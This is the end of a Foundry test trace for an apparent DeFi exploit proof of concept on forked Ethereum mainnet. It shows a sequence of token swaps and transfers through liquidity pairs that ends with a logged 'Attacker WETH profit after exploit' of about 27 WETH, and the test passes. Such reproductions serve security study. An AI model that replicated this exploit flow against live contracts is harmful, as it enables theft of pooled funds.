    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1200218390619292 [1.2e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 9676760774368 [9.676e12])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 9676760774368 [9.676e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x15f9f7066988432d9b1c921649b412efe30d2ee82930cecbd05b98460ebd3e9f → 0x161470e331173b55033dbbbc803353143cd1eb09ad170302d096ac2efea73b9f
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000052a88370d827ed → 0x0000000000000000000000000000000000000000000000000054088d4c62baee
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x15f9f7066988432d9b1c921649b412efe30d2ee82930cecbd05b98460ebd3e9f → 0x161470e331173b55033dbbbc803353143cd1eb09ad170302d096ac2efea73b9f
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x179ad4dc1687290490fb6daa9e1b742de4a119acad841545867048ba6bfa197b → 0x246eadf750e1aee9b90edc4cfec401680ebd41d942e9649ae2389b85d746131b
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x00000000000000000000000000000000000000000000000000057f525e3690c8 → 0x000000000000000000000000000000000000000000000000000599f1c700ea64
    │   │   │   │   │   │   @ 0x1a670d8dd5e8e6b20e2134ca2c3f077cc605eda824aae5201b15d148921a9532: 0x10d9bfe505abd71fffd59240cb7479f454ad945494591d71e7be23ab17046325 → 0x0405e6c9cb51513ad7c2239e6acbecba2a916c27fef3ce1c8bf5d0dfabb86985
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 3465532749254274 [3.465e15]
    │   │   │   └─ ← [Return] 3465532749254274 [3.465e15]
    │   │   ├─ [27513] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 3465532749254274 [3.465e15])
    │   │   │   ├─ [26734] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 3465532749254274 [3.465e15]) [delegatecall]
    │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 382682541344086 [3.826e14]
    │   │   │   │   │   └─ ← [Return] 382682541344086 [3.826e14]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 3413549758015461 [3.413e15])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 34655327492542 [3.465e13])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xDC958664Bc528A55723740b2F32F11CA8B601c83, value: 17327663746271 [1.732e13])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000054088d4c62baee → 0x0000000000000000000000000000000000000000000000000053e90879e6a130
    │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000599f1c700ea64 → 0x00000000000000000000000000000000000000000000000000015c0c38f04556
    │   │   │   │   │   @ 0x72df8701a157df1504c992cc381b2a2a15b3a6a12925db3f882ce3b1ee1fde0a: 0x00c1695c65774a5f09e76d6375ede338dbc8c776452c4551fc7accee6fcf2998 → 0x00f00b82c0c01837fde1f5f45ff75cf9d74d55c240a50e2c4f6fcaa2847bbad2
    │   │   │   │   │   @ 11: 0xf8a96309d39494c8142811d57187f5f0a6a8e825f1c070d2212f49e363cf835d → 0xf84c1ebd1d02f9162c3300b39d75026eaf9fcb8dfacedf1d7b454e7b3a7660e9
    │   │   │   │   │   @ 0x1a670d8dd5e8e6b20e2134ca2c3f077cc605eda824aae5201b15d148921a9532: 0x0405e6c9cb51513ad7c2239e6acbecba2a916c27fef3ce1c8bf5d0dfabb86985 → 0x27e8ae4e0a5894276cdbd027331d2889aa564352e03eded6ac62e49b2a8d84e3
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x246eadf750e1aee9b90edc4cfec401680ebd41d942e9649ae2389b85d746131b → 0x000000000000027248059611785658559c6abfca6f33f951c8ec8eae1a6b440f
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   └─ ← [Return] 3796232299359547 [3.796e15]
    │   │   │   └─ ← [Return] 3796232299359547 [3.796e15]
    │   │   ├─ [504] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 376420197828040 [3.764e14], 116989676722055111610 [1.169e20], 1660075453 [1.66e9]
    │   │   ├─ [38528] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::swap(0, 105357982875200604756 [1.053e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [23162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 105357982875200604756 [1.053e20])
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 105357982875200604756 [1.053e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000005b622bf36e8054a54
    │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6940: 0x000000000000000000000000000000000000000000000006578ed3240de163ba → 0x000000000000000000000000000000000000000000000000a16c13ed25dc1966
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 3796232299359547 [3.796e15]
    │   │   │   │   └─ ← [Return] 3796232299359547 [3.796e15]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 11631693846854506854 [1.163e19]
    │   │   │   ├─ emit Sync(reserve0: 3796232299359547 [3.796e15], reserve1: 11631693846854506854 [1.163e19])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 3419812101531507 [3.419e15], amount1In: 0, amount0Out: 0, amount1Out: 105357982875200604756 [1.053e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x62f2bdbd000000000006578ed3240de163ba0000000000000001565a282d85c8 → 0x62f2bdbd000000000000a16c13ed25dc1966000000000000000d7ca735b02d3b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 105357982875200604756 [1.053e20]
    │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852, 78227801218358484189 [7.822e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852, value: 78227801218358484189 [7.822e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000005b622bf36e8054a54 → 0x0000000000000000000000000000000000000000000000017881c4799be4ad77
    │   │   │   │   @ 0xaced72359d8708e95d2112ba70e71fa267967a5588d15e7c78c1904e0debe410: 0x00000000000000000000000000000000000000000000021977fd6808a4d47add → 0x00000000000000000000000000000000000000000000021db59e62c5f0f517ba
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 11: 0xf8b204fcf9a594f7e3acb342c98e01cdc78cb348eafec46ed3683537e65eec9d → 0xf84c1ebd1d02f9162c3300b39d75026eaf9fcb8dfacedf1d7b454e7b3a7660e9
    │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6940: 0x0000000000000000000000000000000000000000000000021d2f9bb6af4b213e → 0x000000000000000000000000000000000000000000000006578ed3240de163ba
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852) [staticcall]
    │   │   └─ ← [Return] 9992775550046343337914 [9.992e21]
    │   ├─ [5031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852) [staticcall]
    │   │   └─ ← [Return] 16873299927659 [1.687e13]
    │   ├─ emit Sync(reserve0: 9992775550046343337914 [9.992e21], reserve1: 16873299927659 [1.687e13])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 78227801218358484189 [7.822e19], amount1In: 0, amount0Out: 77993117814703407740 [7.799e19], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 10: 0x00000000000000000000011d3033268bbe552814b7556099f34518c80e665f9d → 0x00000000000000000000011d303a755d86f30e5619203a3987dff4dbb4240991
    │   │   @ 8: 0x62f2bd8800000000000000000f589f0c626b00000000021db25c9f76036abd59 → 0x62f2bdbd00000000000000000f589f0c626b00000000021db59e62c5f0f517ba
    │   │   @ 9: 0x00000000000000000000000000000000000023dda58569569ab864ab0ccc88e0 → 0x00000000000000000000000000000000000023dda705ca66b1d96d1e1197d5e7
    │   └─ ← [Stop]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 27130181656842120567 [2.713e19]
    ├─ emit log_named_decimal_uint(key: "Attacker WETH profit after exploit", val: 27130181656842120567 [2.713e19], decimals: 18)
    ├─  storage changes:
    │   @ 35: 0 → 0x0000000000000000000000000000000000000000000000021d2f9bb6af4b213e
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.87s (7.89s CPU time)

Ran 2 test suites in 8.94s (9.47s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
